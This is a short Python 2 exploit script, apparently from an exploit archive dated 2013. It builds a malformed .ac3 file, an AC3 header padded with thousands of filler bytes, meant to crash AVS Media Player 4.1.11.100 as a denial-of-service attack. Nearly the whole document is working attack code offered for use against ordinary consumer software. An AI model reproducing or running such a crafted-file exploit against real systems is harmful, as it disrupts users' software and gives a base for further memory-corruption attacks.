#!/usr/bin/python print """ [+]Exploit Title:AVS Media Player(.ac3)Denial of Service Exploit [+]Vulnerable Product:4.1.11.100 [+]Download Product:http://www.avs4you.com/de/downloads.aspx [+]All AVS4YOU Software has problems with format .ac3 [+]Date: 29.06.2013 [+]Exploit Author: metacom [+]RST [+]Tested on: Windows 7 """ buffer=( "\x0B\x77\x3E\x68\x50\x40\x43\xE1\x06\xA0\xB9" "\x65\xFF\x3A\xBE\x7C\xF9\xF3\xE7\xCF\x9F\x3E" ) junk = "\x41" * 5000 bob = "\x42" * 100 exploit = buffer+ junk + bob try: rst= open("exploit.ac3",'w') rst.write(exploit) rst.close() print("\nExploit file created!\n") except: print "Error"